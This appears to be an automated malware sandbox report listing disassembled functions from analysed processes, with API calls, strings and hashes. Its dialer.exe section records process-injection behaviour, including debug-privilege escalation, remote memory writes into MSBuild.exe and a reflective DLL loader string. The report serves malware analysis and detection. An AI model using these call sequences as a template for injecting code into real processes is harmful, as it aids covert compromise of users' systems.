Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 4c9e796696dd45bbd56c716731e9bf31e04af504279088f1e88f70b5134b5212
Instruction ID: c3449c63ffb1b13f42e522822b158c43401eddf6e0e74d52762e56846d6e21f4
Opcode Fuzzy Hash: 4c9e796696dd45bbd56c716731e9bf31e04af504279088f1e88f70b5134b5212
Instruction Fuzzy Hash: 9E514B66B187C146E7248F3999617ED6B91E741B90F488231D7AC4BBDECF2CE494C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB16AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FFDF7CB171E
GetFileType.KERNEL32 ref: 00007FFDF7CB1734

Strings

@, xrefs: 00007FFDF7CB175F

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 6a82a2755471bbe3140ec34f2b46b4a4d36938cf7a414f9e3e7c0b309ff8612f
Instruction ID: eac6e6f5afa7d47b5e3fe7909507e2b8a998bcb1fe9230dd65ad9e69facf0cad
Opcode Fuzzy Hash: 6a82a2755471bbe3140ec34f2b46b4a4d36938cf7a414f9e3e7c0b309ff8612f
Instruction Fuzzy Hash: 04219A29B0868242EB644B29A4A05BD2651EB45F78F281335E67F177DCCF3CDD91D340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB18D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CB19E2

Strings

", xrefs: 00007FFDF7CB19BB
pow, xrefs: 00007FFDF7CB19D1

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: a2286bed898c3a1dc120edbe39e3dc83cc2fb9b1afc78ecec7540b835b5520b7
Instruction ID: 7ec13a44840a3f89be80d858979292be71207145b205c7805ce83ac274a45a94
Opcode Fuzzy Hash: a2286bed898c3a1dc120edbe39e3dc83cc2fb9b1afc78ecec7540b835b5520b7
Instruction Fuzzy Hash: EF215276E1CAC587D770CF14F041AAEBAB1FBDA748F101326F69906998CBBDD0959B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAAFD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CAB06D

Strings

sqrt, xrefs: 00007FFDF7CAB02E
!, xrefs: 00007FFDF7CAB059

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _handle_error
String ID: !$sqrt
API String ID: 1757819995-799759792
Opcode ID: 9cdd7abfc7ec2821ff9fb9a8809c2d28657f168e2a9a912b69486da624d67edc
Instruction ID: 43d6d5d92b53c8903b6d2827fad83cc3208fb3c62f66264b121641e33e00e2d1
Opcode Fuzzy Hash: 9cdd7abfc7ec2821ff9fb9a8809c2d28657f168e2a9a912b69486da624d67edc
Instruction Fuzzy Hash: AC11827AE18B8582EF51CF11A42076E6661BF967E4F104331EA7D0ABD8DB2DE0859B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAD3DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CAD48E

Strings

!, xrefs: 00007FFDF7CAD476
cos, xrefs: 00007FFDF7CAD3EE

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _handle_error
String ID: !$cos
API String ID: 1757819995-1949035351
Opcode ID: f47f7497202482cb2f08d584c0fa264cf8c0e926f5667d361038845dcde98604
Instruction ID: e114cc4321c7ca107f2ae2cf559db4c130d5266599e812a01f8b214ade8a98eb
Opcode Fuzzy Hash: f47f7497202482cb2f08d584c0fa264cf8c0e926f5667d361038845dcde98604
Instruction Fuzzy Hash: 47010876F19B8542E714CF22942076A6261FB95794F508335EA6D0BBCCDF6CE0404700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAD3FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CAD48E

Part of subcall function 00007FFDF7CACC70: _ctrlfp.LIBCMT ref: 00007FFDF7CACCAB
Part of subcall function 00007FFDF7CACC70: _raise_exc.LIBCMT ref: 00007FFDF7CACD17

Strings

!, xrefs: 00007FFDF7CAD476
sin, xrefs: 00007FFDF7CAD402

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$sin
API String ID: 3384550415-1565623160
Opcode ID: df28e9a67e61d528742b7ef0ded55c29f0354dc44f80b572b08f747d16e1a453
Instruction ID: d7717c854d4f4d8be3bbccf3d807356398b46cc2f7b5d780489fbfc029931ddd
Opcode Fuzzy Hash: df28e9a67e61d528742b7ef0ded55c29f0354dc44f80b572b08f747d16e1a453
Instruction Fuzzy Hash: 04018475F18B8941DB14CF12A42076A6662FB9A7D4F104335EA5D1ABDCEF7CE1508B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAD4B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CAD48E

Part of subcall function 00007FFDF7CACC70: _ctrlfp.LIBCMT ref: 00007FFDF7CACCAB
Part of subcall function 00007FFDF7CACC70: _raise_exc.LIBCMT ref: 00007FFDF7CACD17

Strings

tan, xrefs: 00007FFDF7CAD4BA
!, xrefs: 00007FFDF7CAD476

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$tan
API String ID: 3384550415-2428968949
Opcode ID: 3e6c1757c7b457beae6c6f04f07cf88cb9c67e06ee7f833b012c64832aee675f
Instruction ID: 0d7aaea710b1c3cd80566400f702eabca139da78507eeb311f8ecc21a1d2e610
Opcode Fuzzy Hash: 3e6c1757c7b457beae6c6f04f07cf88cb9c67e06ee7f833b012c64832aee675f
Instruction Fuzzy Hash: 0F017575F28B8541E714CF12946076A6662FF9A7D4F104335E96D1ABDCEF7CE1405700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAD3E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CAD48E

Part of subcall function 00007FFDF7CACC70: _ctrlfp.LIBCMT ref: 00007FFDF7CACCAB
Part of subcall function 00007FFDF7CACC70: _raise_exc.LIBCMT ref: 00007FFDF7CACD17

Strings

!, xrefs: 00007FFDF7CAD476
cos, xrefs: 00007FFDF7CAD3EE

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$cos
API String ID: 3384550415-1949035351
Opcode ID: 67dbfd4f201f226b19c21def6f8ef23c5db519089eb0727a8a8b4c6509d4d56b
Instruction ID: f1a046c23d4ef31acf33583f3598f918dc885eef26355df30cc5c6fe5e6c4fed
Opcode Fuzzy Hash: 67dbfd4f201f226b19c21def6f8ef23c5db519089eb0727a8a8b4c6509d4d56b
Instruction Fuzzy Hash: 0901B576F18B8941E714CF12942076A6262FF9A7D4F104335E9691ABDCEF6CE0405700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB1830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CB18B6

Strings

", xrefs: 00007FFDF7CB188F
exp, xrefs: 00007FFDF7CB18A5

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _handle_error
String ID: "$exp
API String ID: 1757819995-2878093337
Opcode ID: dc88cf671f0a416903fab45837691bc0dfd090079675b840c4007397e590dbc5
Instruction ID: a994c1fbf813cc04daa053d5b0df52b5d0d3966c81783965a0a77bc3aef8a923
Opcode Fuzzy Hash: dc88cf671f0a416903fab45837691bc0dfd090079675b840c4007397e590dbc5
Instruction Fuzzy Hash: 5C01653AE28A8887E320CF2494456AA7A61FFEA744F205315E7441A6A4DB7ED4919B00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: setup.exePID: 7768, Parent PID: 7688COMMON

Executed Functions

Function 00007FF617A612FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1730605056.00007FF617A61000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF617A60000, based on PE: true

Associated: 00000006.00000002.1730572926.00007FF617A60000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1730634799.00007FF617A69000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1730692558.00007FF617A91000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1731262444.00007FF617FB7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1731313526.00007FF617FBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1731343807.00007FF617FBE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1731368401.00007FF617FC3000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1731398664.00007FF617FC4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff617a60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2382d73125df78936d26452b80bcba07539e5c8c97af36270da171beb56e3f
Instruction ID: dea44c386d5e6470529d1a6fa1cd7d1cabfbec2a76929e0c0bddf3755a423599
Opcode Fuzzy Hash: 8e2382d73125df78936d26452b80bcba07539e5c8c97af36270da171beb56e3f
Instruction Fuzzy Hash: CCB01270E08A4DCCE3002F05D84125C37306B08F10F404430D40C43353CE7CB4508710

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dialer.exePID: 6832, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF65A13226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF65A131F2C: StrCpyW.SHLWAPI ref: 00007FF65A131F5D
Part of subcall function 00007FF65A131F2C: StrCatW.SHLWAPI ref: 00007FF65A131F6B
Part of subcall function 00007FF65A131F2C: GetModuleHandleW.KERNEL32 ref: 00007FF65A131F74
Part of subcall function 00007FF65A131F2C: GetCurrentProcess.KERNEL32 ref: 00007FF65A131F94
Part of subcall function 00007FF65A131F2C: K32GetModuleInformation.KERNEL32 ref: 00007FF65A131FA8
Part of subcall function 00007FF65A131F2C: CreateFileW.KERNELBASE ref: 00007FF65A131FD8
Part of subcall function 00007FF65A131F2C: CreateFileMappingW.KERNELBASE ref: 00007FF65A132002
Part of subcall function 00007FF65A131F2C: MapViewOfFile.KERNELBASE ref: 00007FF65A132025
Part of subcall function 00007FF65A131F2C: lstrcmpi.KERNEL32 ref: 00007FF65A13207B
Part of subcall function 00007FF65A131F2C: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A1320E7
Part of subcall function 00007FF65A131F2C: CloseHandle.KERNEL32 ref: 00007FF65A1320F0
Part of subcall function 00007FF65A131F2C: FreeLibrary.KERNEL32 ref: 00007FF65A1320F9

Part of subcall function 00007FF65A131F2C: VirtualProtect.KERNELBASE ref: 00007FF65A1320AE
Part of subcall function 00007FF65A131F2C: VirtualProtect.KERNELBASE ref: 00007FF65A1320DE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13228F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13229F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A1322B9
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF65A1322D0
AdjustTokenPrivileges.KERNELBASE ref: 00007FF65A132308
GetLastError.KERNEL32 ref: 00007FF65A132312
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13231B
FindResourceA.KERNEL32 ref: 00007FF65A13232F
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132346
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13235F
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132371
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13237E
RegCreateKeyExW.KERNELBASE ref: 00007FF65A1323BE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF65A1323E5
RegSetKeySecurity.KERNELBASE ref: 00007FF65A1323FE
LocalFree.KERNEL32 ref: 00007FF65A132408
RegCreateKeyExW.KERNELBASE ref: 00007FF65A13243E
GetCurrentProcessId.KERNEL32 ref: 00007FF65A132448
RegSetValueExW.KERNELBASE ref: 00007FF65A13246F
RegCloseKey.KERNELBASE ref: 00007FF65A132479
RegCloseKey.ADVAPI32 ref: 00007FF65A132483
CreateThread.KERNELBASE ref: 00007FF65A1324A4
GetProcessHeap.KERNEL32 ref: 00007FF65A1324AA
HeapAlloc.KERNEL32 ref: 00007FF65A1324B9
CreateThread.KERNELBASE ref: 00007FF65A1324E8
CreateThread.KERNELBASE ref: 00007FF65A132509
SleepEx.KERNEL32 ref: 00007FF65A132511

Strings

pid, xrefs: 00007FF65A13241B
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF65A1323DE
DLL, xrefs: 00007FF65A132321
ntdll.dll, xrefs: 00007FF65A132277
SOFTWARE\dialerconfig, xrefs: 00007FF65A132399
SeDebugPrivilege, xrefs: 00007FF65A1322C9
kernel32.dll, xrefs: 00007FF65A132283
svc64, xrefs: 00007FF65A132452

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 1970497257-1130149537
Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction ID: 04699a5d65f21b7bb95f8c1e480dee23d0a80a214912cc637b651e7e6d772535
Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction Fuzzy Hash: 00815F36A08B4296EF309F25E8441A977A0FF88759B484177DA8EE7B64DF3CE148C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1310C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF65A1318AC: OpenProcess.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318CA
Part of subcall function 00007FF65A1318AC: IsWow64Process.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318E0
Part of subcall function 00007FF65A1318AC: FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF65A13110E), ref: 00007FF65A1318FB

OpenProcess.KERNEL32 ref: 00007FF65A13112C
OpenProcess.KERNEL32 ref: 00007FF65A13114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF65A131170
PathFindFileNameW.SHLWAPI ref: 00007FF65A13117E
lstrlenW.KERNEL32 ref: 00007FF65A13118A
StrCpyW.SHLWAPI ref: 00007FF65A1311A1
CloseHandle.KERNEL32 ref: 00007FF65A1311AD
StrCmpIW.SHLWAPI ref: 00007FF65A1311E2
NtQueryInformationProcess.NTDLL ref: 00007FF65A131216
OpenProcessToken.ADVAPI32 ref: 00007FF65A131240
GetTokenInformation.KERNELBASE ref: 00007FF65A13126C
GetLastError.KERNEL32 ref: 00007FF65A131276
LocalAlloc.KERNEL32 ref: 00007FF65A131289
GetTokenInformation.KERNELBASE ref: 00007FF65A1312B5
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF65A1312C2
GetSidSubAuthority.ADVAPI32 ref: 00007FF65A1312D1
LocalFree.KERNEL32 ref: 00007FF65A1312E9
CloseHandle.KERNEL32 ref: 00007FF65A1312FD
StrStrA.SHLWAPI ref: 00007FF65A1313A7
VirtualAllocEx.KERNELBASE ref: 00007FF65A13140E
WriteProcessMemory.KERNELBASE ref: 00007FF65A131431
WaitForSingleObject.KERNEL32 ref: 00007FF65A13147D
GetExitCodeThread.KERNEL32 ref: 00007FF65A131493
FindCloseChangeNotification.KERNELBASE ref: 00007FF65A1314AB
CloseHandle.KERNEL32 ref: 00007FF65A1314B4

Strings

ReflectiveDllMain, xrefs: 00007FF65A13139D
MSBuild.exe, xrefs: 00007FF65A1311B8
dialer.exe, xrefs: 00007FF65A1311CC
@, xrefs: 00007FF65A131401

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
API String ID: 2998269048-3753927220
Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction ID: dd7df13c16794430a1aec4a0f28db0026885bceef8b7f8f801d0f6351a9217ca
Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction Fuzzy Hash: DFB18031A0868296EF34CF16E8442B927E5FF84B84F088176CA8EA7794DF3CE545C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1314D8 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF65A13150B
HeapAlloc.KERNEL32 ref: 00007FF65A13151E
GetProcessHeap.KERNEL32 ref: 00007FF65A13152C
HeapAlloc.KERNEL32 ref: 00007FF65A13153D
K32EnumProcesses.KERNEL32 ref: 00007FF65A131557
OpenProcess.KERNEL32 ref: 00007FF65A131585
K32EnumProcessModules.KERNEL32 ref: 00007FF65A1315AA
ReadProcessMemory.KERNELBASE ref: 00007FF65A1315E1
FindCloseChangeNotification.KERNELBASE ref: 00007FF65A13161D
GetProcessHeap.KERNEL32 ref: 00007FF65A13162F
HeapFree.KERNEL32 ref: 00007FF65A13163D
GetProcessHeap.KERNEL32 ref: 00007FF65A131643
HeapFree.KERNEL32 ref: 00007FF65A131651

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
String ID:
API String ID: 2178662837-0
Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction ID: 08d6603cf205052dc1854035e52b3dd3b3937f717723958e479da44f8965ed33
Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction Fuzzy Hash: 9D51CE72B196828AEF60CF66E8546A922A1FF49B84F484076DE8DA7754DF3CD046C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A131B54 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF65A131BA3
SetEntriesInAclW.ADVAPI32 ref: 00007FF65A131BEB
LocalAlloc.KERNEL32 ref: 00007FF65A131BFB
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF65A131C0F
